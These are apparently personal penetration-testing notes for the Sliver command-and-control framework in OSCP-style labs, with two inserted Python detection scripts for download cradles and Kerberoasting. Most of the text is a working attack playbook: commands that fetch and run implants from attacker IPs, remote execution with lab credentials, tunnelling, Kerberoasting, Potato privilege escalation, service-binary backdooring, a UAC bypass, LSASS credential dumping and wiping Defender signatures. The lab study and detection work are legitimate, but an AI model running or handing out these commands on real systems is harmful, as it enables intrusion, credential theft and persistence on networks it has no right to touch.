sliver

https://seamlessintelligence.com.au/sliver_2.html

doc https://sliver.sh/docs

guide https://seamlessintelligence.com.au/sliver_2.html

cheatsheet https://github.com/Anon-Exploiter/sliver-cheatsheet?tab=readme-ov-file

Sometimes the sliver package on Kali is buggy; use the upstream release from https://github.com/BishopFox/sliver/releases instead.

setup server

$ sliver-server
...
[server] sliver > generate --mtls 192.168.45.249,10.10.207.147 -j 3 -e -l -Z s -N agent
[server] sliver > generate --mtls 192.168.45.249,10.10.207.147 -j 3 -e -l -Z s -o linux -N agent.elf
[server] sliver > mtls
[server] sliver > armory install all
[server] sliver > sessions

download and run sliver client

└─$ python3 -m http.server 80 -d .
powershell
powershell.exe -Command "Invoke-WebRequest -OutFile c:\temp\windows\agent.exe http://192.168.45.249/agent.exe ; .\agent.exe"
"iwr -uri http://192.168.45.212/agent.exe -Outfile agent.exe ; c:\temp\windows\agent.exe"

cmd
certutil -urlcache -split -f "http://192.168.45.249/agent.exe" agent.exe
curl.exe -o c:\windows\temp\agent1.exe http://192.168.49.100:81/agent1.exe
bitsadmin /transfer myDownloadJob /download /priority normal http://192.168.45.249/agent.exe c:\users\temp\

agent.exe
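From the defender's side, the cradles above (Invoke-WebRequest/iwr, certutil -urlcache, curl.exe -o, bitsadmin /transfer) are what process-creation telemetry should catch. The following hunt is an added example, not part of these notes or of sliver: it assumes Sysmon event 1 / Security 4688 records reduced to (image, command line) pairs, and the sample records are constructed from the commands in this section.

```python
"""Hunt for the download cradles above in process-creation telemetry.

Added example, not part of the original notes. It assumes Sysmon event 1 /
Security 4688 records reduced to (image, command_line) pairs; the sample
records below are constructed from the commands in this section.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Rule:
    name: str
    image: re.Pattern     # matched against the image basename
    cmdline: re.Pattern   # matched against the full command line


# One rule per cradle seen above: Invoke-WebRequest/iwr, certutil -urlcache,
# curl.exe -o <url>, bitsadmin /transfer. All patterns are case-insensitive.
RULES = [
    Rule("powershell_web_download",
         re.compile(r"^(powershell|pwsh)\.exe$", re.I),
         re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)),
    Rule("certutil_urlcache_download",
         re.compile(r"^certutil\.exe$", re.I),
         re.compile(r"-urlcache\b.*https?://", re.I)),
    Rule("curl_download_to_file",
         re.compile(r"^curl\.exe$", re.I),
         re.compile(r"\s-o\s.*https?://|https?://.*\s-o\s", re.I)),
    Rule("bitsadmin_transfer",
         re.compile(r"^bitsadmin\.exe$", re.I),
         re.compile(r"/transfer\b.*https?://", re.I)),
]

URL_RE = re.compile(r"https?://[^\s\"';]+", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    url: Optional[str]    # staging URL, if one could be pulled from the command line
    command_line: str


def scan(records: List[Tuple[str, str]]) -> List[Finding]:
    """Return one Finding per record that matches a cradle rule (first rule wins)."""
    findings = []
    for image, cmdline in records:
        base = ntpath.basename(image)   # ntpath handles Windows paths on any host
        for rule in RULES:
            if rule.image.match(base) and rule.cmdline.search(cmdline):
                m = URL_RE.search(cmdline)
                findings.append(Finding(rule.name, base, m.group(0) if m else None, cmdline))
                break
    return findings


def staging_hosts(findings: List[Finding]) -> Set[str]:
    """Distinct host[:port] values the cradles pulled from: the hunt/block list."""
    return {urlsplit(f.url).netloc for f in findings if f.url}


# Constructed sample telemetry: the four cradles from the notes plus three
# benign look-alikes that must not fire.
SAMPLE_RECORDS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe -Command "Invoke-WebRequest -OutFile c:\temp\windows\agent.exe http://192.168.45.249/agent.exe ; .\agent.exe"'),
    (r"C:\Windows\System32\certutil.exe",
     r'certutil -urlcache -split -f "http://192.168.45.249/agent.exe" agent.exe'),
    (r"C:\Windows\System32\curl.exe",
     r"curl.exe -o c:\windows\temp\agent1.exe http://192.168.49.100:81/agent1.exe"),
    (r"C:\Windows\System32\bitsadmin.exe",
     "bitsadmin /transfer myDownloadJob /download /priority normal http://192.168.45.249/agent.exe c:\\users\\temp\\"),
    (r"C:\Windows\System32\certutil.exe", r"certutil -hashfile agent.exe SHA256"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -Command Get-Process"),
    (r"C:\Windows\System32\curl.exe", r"curl.exe --version"),
]

if __name__ == "__main__":
    hits = scan(SAMPLE_RECORDS)
    for f in hits:
        print(f"{f.rule:28} {f.image:16} {f.url}")
    print("staging hosts:", sorted(staging_hosts(hits)))
```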

Unpack zip from powershell

Expand-Archive -Force C:\path\to\archive.zip C:\where\to\extract\to

upload and run sliver client over smb

└─$ nxc smb client02 -u o.foller -p EarlyMorningFootball777 -x 'powershell.exe -Command "Invoke-WebRequest -OutFile c:\windows\temp\agent.exe http://192.168.45.212/agent5.exe"'
SMB         192.168.174.160 445    CLIENT02         [+] Executed command via wmiexec
└─$ nxc smb client02 -u o.foller -p EarlyMorningFootball777 -x 'c:\windows\temp\agent.exe'
SMB         192.168.174.160 445    CLIENT02         [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB         192.168.174.160 445    CLIENT02         [+] zeus.corp\o.foller:EarlyMorningFootball777 (Pwn3d!)
SMB         192.168.174.160 445    CLIENT02         [-] wmiexec: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method
SMB         192.168.174.160 445    CLIENT02         [+] Executed command via wmiexec

If you get the error "Execute command failed, ... has no 'Invoke' rights to execute command (shell type: cmd)", try winrm instead:

└─$ nxc winrm gyoza -u Eric.Wallows -p EricLikesRunning800 -X "cmd /c agent212.exe"

upload and run sliver client via MSSQL

$ nxc mssql MS02 -u sql_svc -p Dolphin1 --put-file agent.exe C:\\Windows\\Temp\\agent.exe
$ nxc mssql MS02 -u sql_svc -p Dolphin1 -X "& C:\\Windows\\Temp\\agent.exe"

wait for 20 seconds

create tunnel with ligolo-ng

$ sudo ligolo-proxy -selfcert
ligolo-ng » certificate_fingerprint
[server] sliver (agent) > upload /usr/share/ligolo-ng-common-binaries/ligolo-ng_agent_0.8.2_windows_amd64.exe
[server] sliver (agent) > execute -t 5 cmd /c "start /b ligolo-ng_agent_0.8.2_windows_amd64.exe -connect 192.168.45.204:11601 -accept-fingerprint B9A0DFF9A9BDB140610A962FBC48616364677E962F2755272B1F54E5DBA4E486"
ligolo-ng » session
[Agent : NT AUTHORITY\SYSTEM@MS01] » autoroute

create forward with ligolo-ng for sliver - more stable than sliver rportfwd

[Agent : NT AUTHORITY\SYSTEM@MS01] » listener_add --addr 10.10.207.147:8888 --to 192.168.45.204:8888 --tcp

masscan and nmap over the ligolo-ng interface (here named enabledmagus)

└─$ sudo ~/bin/masscan -e enabledmagus -p-,U:- --banners --rate=1000 $(grep 10.10 /etc/hosts|cut -d' ' -f1) --adapter-ip 10.10.207.147 | tee masscan.10.10
└─$ cat masscan.10.10 | ~/bin/masscan2nmap.py | sudo parallel

show my user/group/privilege

[server] sliver (agent) > execute -o whoami /all

winPEAS / linpeas

[server] sliver (agent) > upload /usr/share/peass/winpeas/winPEASany.exe
[server] sliver (agent) > execute -t 600 -o -E err -O username.winpeasy winPEASany.exe
[server] sliver (agent) > download username.winpeasy

[server] sliver (agent.elf) > upload /usr/share/peass/linpeas/linpeas.sh
[server] sliver (agent.elf) > execute -t 5 -o chmod +x linpeas.sh
[server] sliver (agent.elf) > execute -t 600 -o -E err -O www.linpeas linpeas.sh

Linux exploit suggester, with some exploits

[server] sliver (agent.elf) > upload /home/pentests/lpe-linux.tgz
[server] sliver (agent.elf) > execute -t 5 -o tar xvzf lpe-linux.tgz
[server] sliver (agent.elf) > execute -t 10 -o lpe-linux/linux-exploit-suggester.sh

list the whole filesystem, save the output to a local file (-s) and grep it

[server] sliver (agent) > execute -t 300 -s cmd /c "dir /s /b"
$ grep -vE '(.png|.jpg|SysWOW64|.manifest|RollupFix|WinSxS|PCHealthCheck|WindowsUpdate.|WindowsApps)' /tmp/execute_MS01_202507090809534184240560.log
$ grep -E '(proof.txt|local.txt|PSReadLine/ConsoleHost_history*|id_rsa*|.kdbx|.ini|.txt|.pdf|.xls|.xlsx|.doc|.docx|.db).$' /tmp/execute_MS01_202507090809534184240560.log | less

audit for weaknesses (SharpUp / Seatbelt)

[server] sliver (agent1) > sharpup -t 200 -- audit

[server] sliver (agent1) > seatbelt -t 200 -- -group=all

audit with PrivescCheck (privilege escalation enumeration script for Windows)

└─$ wget 'https://raw.githubusercontent.com/itm4n/PrivescCheck/refs/heads/master/release/PrivescCheck.ps1'
[server] sliver (agent212) > upload PrivescCheck.ps1
[server] sliver (agent212) > execute -o -t 300 powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Extended checks + human-readable reports
[server] sliver (agent212) > execute -o -t 600 powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"

find powershell history file

[server] sliver (agent1) > cat AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt

show processes

[server] sliver (agent4) > ps -O -c

bof-roast

[server] sliver (agent) > execute -o -- setspn.exe -Q */*
[server] sliver (agent) > bof-roast MSSQL/MS02.oscp.exam

[*] Successfully executed bof-roast (coff-loader)
[*] Got output:
[+] Target SPN: MSSQL/MS02.oscp.exam
[+] Got Ticket! Convert it with apreq2hashcat.py
YIIGbwYJ...
$ tee apreq.ticket <<EOF
YIIGbwYJ...
EOF
$ wget https://raw.githubusercontent.com/cube0x0/BofRoast/refs/heads/main/BofRoast/apreq2hashcat.py
$ python3 apreq2hashcat.py apreq.ticket > hash.ticket

# look for $krb5tgs$23$ (RC4); a $krb5tgs$18$ (AES) hash is far too slow to crack

$ hashcat hash.ticket /usr/share/wordlists/rockyou.txt.gz -m 13100 -a 0 -r /usr/share/hashcat/rules/best64.rule

rubeus - kerberoasting

[server] sliver (agent2) > rubeus kerberoast /simple
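What both the bof-roast and rubeus kerberoast steps above leave on the domain controller is a TGS request (Security event 4769) for a user-owned SPN with RC4 (etype 0x17), which is exactly what yields the crackable $krb5tgs$23$ hashes. The check below is an added example, not part of these notes or of sliver: it flags RC4 TGS requests for user SPNs and the burst pattern a full roast produces; the records are constructed, with the detection parameters (threshold, window) being assumptions.

```python
"""Added example (not from the notes): flagging Kerberoasting in DC telemetry.

A TGS request (Security event 4769) for a user-owned SPN with the RC4
encryption type 0x17 is what produces the $krb5tgs$23$ hashes mentioned
above; a burst of such requests from one principal is the roast itself.
Remediation: move those service accounts to AES-only
(msDS-SupportedEncryptionTypes) or a gMSA, and rotate their passwords.
The records below are constructed; threshold and window are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

RC4_HMAC = 0x17            # etype 23 -> $krb5tgs$23$
AES_ETYPES = {0x11, 0x12}  # etype 17/18 -> $krb5tgs$17$ / $krb5tgs$18$


@dataclass(frozen=True)
class TgsRequest:          # the 4769 fields this check needs
    time: datetime
    requester: str         # TargetUserName: who asked for the ticket
    service: str           # ServiceName: the account owning the SPN
    etype: int             # TicketEncryptionType
    ip: str                # IpAddress


@dataclass(frozen=True)
class Alert:
    kind: str
    requester: str
    ip: str
    services: Tuple[str, ...]


def is_user_spn(service: str) -> bool:
    # Machine accounts end in '$' and krbtgt is the TGT service; neither is a roast target.
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoast(records: List[TgsRequest], burst: int = 3,
                      window: timedelta = timedelta(minutes=5)) -> List[Alert]:
    """One alert per (requester, ip) that asked for RC4 tickets to user SPNs.

    'kerberoast_burst_rc4' when >= `burst` distinct user SPNs were requested
    inside `window`, otherwise the lower-severity 'rc4_tgs_for_user_spn'.
    """
    rc4 = [r for r in records if r.etype == RC4_HMAC and is_user_spn(r.service)]
    by_src: Dict[Tuple[str, str], List[TgsRequest]] = defaultdict(list)
    for r in rc4:
        by_src[(r.requester, r.ip)].append(r)
    alerts = []
    for (requester, ip), reqs in by_src.items():
        reqs.sort(key=lambda r: r.time)
        best: Tuple[str, ...] = ()
        for i, start in enumerate(reqs):          # sliding window, keep the densest one
            in_win = [r for r in reqs[i:] if r.time - start.time <= window]
            names = tuple(sorted({r.service for r in in_win}))
            if len(names) > len(best):
                best = names
        kind = "kerberoast_burst_rc4" if len(best) >= burst else "rc4_tgs_for_user_spn"
        alerts.append(Alert(kind, requester, ip, best))
    return alerts


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample: normal AES traffic, one principal requesting every user
# SPN with RC4 within seconds (the roast), and one stray legacy RC4 request.
SAMPLE = [
    TgsRequest(_t("2025-07-06T13:00:01"), "celia.almeda", "MS02$", 0x12, "10.10.207.20"),
    TgsRequest(_t("2025-07-06T13:00:05"), "celia.almeda", "sql_svc", 0x12, "10.10.207.20"),
    TgsRequest(_t("2025-07-06T13:16:40"), "o.foller", "sql_svc", RC4_HMAC, "10.10.207.147"),
    TgsRequest(_t("2025-07-06T13:16:41"), "o.foller", "web_svc", RC4_HMAC, "10.10.207.147"),
    TgsRequest(_t("2025-07-06T13:16:41"), "o.foller", "backup_svc", RC4_HMAC, "10.10.207.147"),
    TgsRequest(_t("2025-07-06T13:16:42"), "o.foller", "MS01$", RC4_HMAC, "10.10.207.147"),
    TgsRequest(_t("2025-07-06T14:00:00"), "scanner", "sql_svc", RC4_HMAC, "10.10.207.50"),
]

if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE):
        print(f"{a.kind:24} {a.requester:14} {a.ip:15} {', '.join(a.services)}")
```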

Elevate privilege / General

see https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/

SeBackupPrivilege: we can dump password hashes from registry hives and read restricted files.
SeDebugPrivilege: we can impersonate the token of lsass.exe, winlogon.exe and other processes.
SeImpersonatePrivilege: we can use LocalPotato techniques.
SeTakeOwnershipPrivilege: we can read restricted files by taking ownership.

Elevate privilege / abusing SeImpersonatePrivilege

Inject PrintSpoofer64.exe (converted to shellcode with donut) into a running process and launch the sliver agent. Download PrintSpoofer64.exe from https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
$ donut -i PrintSpoofer64.exe -p "-i -c c:\windows\temp\agent.exe" -a 2 -o print.bin
[server] sliver (agent1) > upload print.bin
[server] sliver (agent1) > execute-shellcode -p 4596 print.bin
[*] Session 8ff76082 agent1 - 192.168.179.141:58432 (MS01) - windows/amd64 - Sun, 06 Jul 2025 13:16:45 CEST

another way

[server] sliver (agent213) > upload PrintSpoofer64.exe
[server] sliver (agent213) > execute -o -t 20 PrintSpoofer64.exe -c agent.exe

JuicyPotatoNG

└─$ wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip
└─$ 7z x JuicyPotatoNG.zip
[server] sliver (agent212) > upload agent212.exe
[server] sliver (agent212) > upload JuicyPotatoNG.exe
[server] sliver (agent212) > execute -o -t 4 JuicyPotatoNG.exe -t * -p agent212.exe

Another method, but neither stable nor fast

└─$ wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
[server] sliver (agent212) > upload GodPotato-NET4.exe
[server] sliver (agent212) > execute -o -t 50 GodPotato-NET4.exe -cmd "cmd /c whoami /all"
[server] sliver (agent212) > execute -o -t 50 GodPotato-NET4.exe -cmd "cmd /c agent212.exe"

Not tested

└─$ wget https://github.com/antonioCoco/RoguePotato/releases/download/1.0/RoguePotato.zip
└─$ 7z x RoguePotato.zip
RoguePotato.exe
???

If the server has not been patched since January 2023, try LocalPotato (CVE-2023-21746)

└─$ wget https://github.com/decoder-it/LocalPotato/releases/download/v1.1/LocalPotato.zip
└─$ 7z x LocalPotato.zip
[server] sliver (agent212) > upload LocalPotato.exe
????

Elevate with SeBackupPrivilege

https://github.com/giuliano108/SeBackupPrivilege
https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/

└─$ wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll?raw=true -O SeBackupPrivilegeUtils.dll
└─$ wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll?raw=true -O SeBackupPrivilegeCmdLets.dll
[server] sliver (agent5) > upload SeBackupPrivilegeUtils.dll
[server] sliver (agent5) > upload SeBackupPrivilegeCmdLets.dll
[server] sliver (agent5) > shell
PS C:\Users\d.chambers\appdata> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\d.chambers\appdata> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\d.chambers\appdata> Get-SeBackupPrivilege
PS C:\Users\d.chambers\appdata> copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\proof.txt  C:\Users\d.chambers\appdata\proof.txt -overwrite

Elevate with another user's password

[server] sliver (agent) > runas -p agent.exe -u "zachary" -P "Th3R@tC@tch3r"

Backdoor the binary of a local service we can modify, as reported by the sharpup audit

[server] sliver (agent1) > sharpup -t 200 -- audit
...
=== Modifiable Service Binaries ===
        Service 'GPGOrchestrator' (State: Running, StartMode: Auto) : "C:\Program Files\MilleGPG5\GPGService.exe"


=== Modifiable Services ===
        Service 'GPGOrchestrator' (State: Running, StartMode: Auto)
...
[server] sliver (agent1) > execute -o sc query GPGOrchestrator
[server] sliver (agent1) > execute -o sc stop GPGOrchestrator
[server] sliver (agent1) > profiles new --mtls 192.168.45.165 -f shellcode service
[server] sliver (agent1) > backdoor --profile service "C:\Program Files\MilleGPG5\GPGService.exe"
[server] sliver (agent1) > execute -t 4 -o sc start GPGOrchestrator

Elevate from a UAC-restricted administrator to a full (UAC-bypassed) administrator

inspiration from https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html

$ tee CMSTP-UAC-Bypass.ps1 <<EOF
function Bypass-UAC
{
    Param(
        [Parameter(Mandatory = \$true, Position = 0)]
        [string]\$Command
    )
    if(-not ([System.Management.Automation.PSTypeName]'CMSTPBypass').Type)
    {
        [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null
    }
    [CMSTPBypass]::Execute(\$Command)
}
EOF
[server] sliver (agent) > upload CMSTP-UAC-Bypass.ps1
[server] sliver (agent) > upload agent.exe
[server] sliver (agent) > shell
PS C:\users\zachary> . .\CMSTP-UAC-Bypass.ps1
PS C:\users\zachary> Bypass-UAC -Command "C:\users\zachary\agent.exe"
[server] sliver (agent) > use
[server] sliver (agent) > getsystem

Certificate Abuse

[server] sliver (agent) > certify find /vulnerable
[server] sliver (agent) > certify request /ca:sv001-dc.corp1.local\\corp1-SV001-DC-CA /template:WebServerVuln /altname:jboss
$ openssl pkcs12 -in cert.cer -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
[server] sliver (agent) > upload /mnt/seamless/sliver/cert.pfx
[server] sliver (agent) > rubeus asktgt /user:jboss /certificate:C:\\Windows\\system32\\cert.pfx

dump LSASS credentials with mimikatz

[server] sliver (SOLID_BLADE) > mimikatz privilege::debug sekurlsa::logonpasswords

dump LSASS credentials, alternative: procdump the process and parse it with pypykatz

[server] sliver (agent) > ps -e lsa
[server] sliver (agent) > procdump -p 676
$ pypykatz lsa minidump --json /tmp/procdump_MS01_676_844155305

Run programs

[server] sliver (agent1) > execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

When elevated to an AD user, enumerate AD

[server] sliver (agent1) > whoami

Logon ID: OSCP\celia.almeda
[*] Current Token ID: OSCP\celia.almeda
[server] sliver (agent1) > sharp-hound-4 -- '-c all,GPOLocalGroup'

[*] sharp-hound-4 output:
2025-07-06T06:01:45.7689958-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-07-06T06:01:45.8692195-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-07-06T06:01:45.8753762-07:00|INFORMATION|Initializing SharpHound at 6:01 AM on 7/6/2025
2025-07-06T06:01:45.9684446-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for oscp.exam : DC01.oscp.exam
2025-07-06T06:01:46.1258558-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-07-06T06:01:46.2613032-07:00|INFORMATION|Beginning LDAP search for oscp.exam
2025-07-06T06:01:46.2613032-07:00|INFORMATION|Testing ldap connection to oscp.exam
2025-07-06T06:01:46.2795686-07:00|INFORMATION|Beginning LDAP search for oscp.exam Configuration NC
2025-07-06T06:02:16.9212082-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 41 MB RAM
2025-07-06T06:02:28.4338157-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-07-06T06:02:28.4338157-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-07-06T06:02:28.6092375-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.OSCP.EXAM: SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel:CertificateMappingMethods
System.Security.SecurityException: Requested registry access is not allowed.
   at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
   at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
   at SharpHoundCommonLib.SHRegistryKey.GetValue(String subkey, String name)
   at SharpHoundCommonLib.Helpers.GetRegistryKeyData(String target, String subkey, String subvalue, ILogger log)
The Zone of the assembly that failed was:
MyComputer
2025-07-06T06:02:28.6250783-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.OSCP.EXAM: SYSTEM\CurrentControlSet\Services\Kdc:StrongCertificateBindingEnforcement
System.Security.SecurityException: Requested registry access is not allowed.
   at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
   at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
   at SharpHoundCommonLib.SHRegistryKey.GetValue(String subkey, String name)
   at SharpHoundCommonLib.Helpers.GetRegistryKeyData(String target, String subkey, String subvalue, ILogger log)
The Zone of the assembly that failed was:
MyComputer
2025-07-06T06:02:28.6623263-07:00|INFORMATION|Consumers finished, closing output channel
2025-07-06T06:02:28.6734273-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-07-06T06:02:28.8036967-07:00|INFORMATION|Status: 332 objects finished (+332 7.904762)/s -- Using 51 MB RAM
2025-07-06T06:02:28.8123637-07:00|INFORMATION|Enumeration finished in 00:00:42.5540337
2025-07-06T06:02:28.8550561-07:00|INFORMATION|Saving cache with stats: 273 ID to type mappings.
 274 name to SID mappings.
 3 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2025-07-06T06:02:28.8844479-07:00|INFORMATION|SharpHound Enumeration Completed at 6:02 AM on 7/6/2025! Happy Graphing!

[server] sliver (agent1) > download 20250706060228_BloodHound.zip

[*] Wrote 25188 bytes (1 file successfully, 0 files unsuccessfully) to /home/chel/offsec/Challenge 4 - OSCP A/20250706060228_BloodHound.zip

[server] sliver (agent1) >

fetch powershell script and call it with arguments

sliver (AMUSED_GEMSBOK) > sharpsh -- '-u http://192.168.56.1:9090/PowerView.ps1 -e -c RwBlAHQALQBEAG8AbQBhAGkAbgBHAHIAbwB1AHAAIAAiAEQAbwBtAGEAaQBuACAAQQBkAG0AaQBuAHMAIgA='

download a directory recursively into a tgz

[server] sliver (agent) > download -r MicrosoftEdgeBackups

host content

[server] sliver > http
[server] sliver > websites add-content --website tool --content agent.exe

SQLrecon

See https://github.com/skahwah/SQLRecon/wiki

Troubleshooting

If generating an implant fails with this error, delete the old build with the same name first:

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[!] rpc error: code = Unknown desc = UNIQUE constraint failed: implant_builds.name

[server] sliver > implants
[server] sliver > implants rm agent-name

Overview

Commands:
=========
  clear       clear the screen
  exit        exit the shell
  help        use 'help [command]' for command help
  monitor     Monitor threat intel platforms for Sliver implants
  wg-config   Generate a new WireGuard client config
  wg-portfwd  List ports forwarded by the WireGuard tun interface
  wg-socks    List socks servers listening on the WireGuard tun interface


Generic:
========
  aliases           List current aliases
  armory            Automatically download and install extensions/aliases
  background        Background an active session
  beacons           Manage beacons
  builders          List external builders
  canaries          List previously generated canaries
  cursed            Chrome/electron post-exploitation tool kit (∩`-´)⊃━☆゚.*・。゚
  dns               Start a DNS listener
  env               List environment variables
  generate          Generate an implant binary
  hosts             Manage the database of hosts
  http              Start an HTTP listener
  https             Start an HTTPS listener
  implants          List implant builds
  jobs              Job control
  licenses          Open source licenses
  loot              Manage the server's loot store
  mtls              Start an mTLS listener
  prelude-operator  Manage connection to Prelude's Operator
  profiles          List existing profiles
  reaction          Manage automatic reactions to events
  regenerate        Regenerate an implant
  sessions          Session management
  settings          Manage client settings
  stage-listener    Start a stager listener
  tasks             Beacon task management
  update            Check for updates
  use               Switch the active session or beacon
  version           Display version information
  websites          Host static content (used with HTTP C2)
  wg                Start a WireGuard listener


Multiplayer:
============
  kick-operator  Kick an operator from the server
  multiplayer    Enable multiplayer mode
  new-operator   Create a new operator config file
  operators      Manage operators


Sliver - 3rd Party extensions:
==============================
  bof-roast                      Beacon Object File repo for roasting Active Directory
  bof-servicemove                Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking
  c2tc-addmachineaccount         AddMachineAccount [Computername] [Password <Optional>]
  c2tc-askcreds                  Collect passwords using CredUIPromptForWindowsCredentialsName
  c2tc-domaininfo                enumerate domain information using Active Directory Domain Services
  c2tc-kerberoast                A BOF tool to list all SPN enabled user/service accounts or request service tickets (TGS-REP)
  c2tc-kerbhash                  port of the Mimikatz/Rubeus hash command
  c2tc-klist                     Displays a list of currently cached Kerberos tickets.
  c2tc-lapsdump                  Dump LAPS passwords from specified computers within Active Directory
  c2tc-petitpotam                PetitPotam <capture server ip or hostname> <target server ip or hostname>
  c2tc-psc                       show detailed information from processes with established TCP and RDP connections
  c2tc-psk                       show detailed information from the windows kernel and loaded driver modules
  c2tc-psm                       show detailed information from a specific process id
  c2tc-psw                       Show Window titles from processes with active Windows
  c2tc-psx                       show (detailed) information from all processes running on the system
  c2tc-smbinfo                   Gather remote system version info using the NetWkstaGetInfo API
  c2tc-spray-ad                  Perform a Kerberos or ldap password spraying attack against Active Directory
  c2tc-startwebclient            Starting WebClient Service Programmatically
  c2tc-wdtoggle                  Patch lsass to enable WDigest credential caching
  c2tc-winver                    Display the version of Windows that is running, the build number and patch release (Update Build Revision)
  chisel                         Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH
  chromiumkeydump                Dump Chrome/Edge Masterkey
  coff-loader                    Load and execute Beacon Object Files (BOFs) in memory.
  credman                        Dump credentials using the CredsBackupCredentials API
  delegationbof                  LDAP checks for RBCD, Constrained, Constrained w/Protocol Transition, Unconstrained Delegation, ASREP, and Kerberoastable SPNs
  find-module                    Uses direct system calls to enumerate processes for specific modules
  find-proc-handle               Uses direct system calls to enumerate processes for specific process handles
  go-cookie-monster              Chrome cookie stealer with AppBound key support
  handlekatz                     Implementation of handlekatz as a BOF (x64 only)
  hashdump                       Dump local SAM password hashes
  hollow                         EarlyBird process hollowing technique
  inject-amsi-bypass             Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
  inject-clipboard               inject into a process
  inject-conhost                 inject into a process
  inject-createremotethread      inject into a process
  inject-ctray                   inject into a process
  inject-dde                     inject into a process
  inject-etw-bypass              Inject ETW Bypass into Remote Process via Syscalls (HellsGate/HalosGate)
  inject-kernelcallbacktable     inject into a process
  inject-ntcreatethread          inject into a process
  inject-ntqueueapcthread        inject into a process
  inject-setthreadcontext        inject into a process
  inject-svcctrl                 inject into a process
  inject-tooltip                 inject into a process
  inject-uxsubclassinfo          inject into a process
  inline-execute-assembly        in process .NET assembly execution
  jump-psexec                    psexec lateral movement module
  jump-wmiexec                   wmiexec lateral movement module
  kerbrute                       A tool to perform Kerberos pre-auth bruteforcing
  ldapsigncheck                  check LDAP signing
  mimikatz                       A little tool to play with Windows security
  nanodump                       A Beacon Object File that creates a minidump of the LSASS process.
  nanorobeus                     Beacon Object File for managing Kerberos tickets
  patchit                        patch, check and revert AMSI and ETW for x64 process
  portbender                     TCP Port Redirection Utility
  raw-keylogger                  Logs keystrokes using the raw input interface
  remote-adcs-request            Request an certificate from an AD certificate server
  remote-adcs_request_on_behalf  Requests an enrollment certificate on behalf of another user
  remote-adduser                 Add a new user to a machine
  remote-addusertogroup          Add the specified user to the domain group
  remote-chrome-key              Get Decryption key usable with Chlonium (https://github.com/rxwx/chlonium)
  remote-enable-user             Unlock and enable a local / remote user account
  remote-get_priv                Activate the specified token privledge, more for non-cobalt strike users
  remote-ghost_task              direct registry manipulation to create scheduled tasks without triggering the usual event logs
  remote-global_unprotect        Attempts to find, decrypt, and download Global Protect VPN profiles and HIP settings
  remote-lastpass                Searches memory for LastPass passwords and hashes
  remote-make_token_cert         Applies an impersonation token based on the Alt Name in a supplied .pfx file
  remote-office-tokens           Searches memory for Office JWT Access Tokens
  remote-procdump                Dumps the specified process to the specified output file
  remote-process-destroy         Attempt to crash a local process by cutting all handles in it.
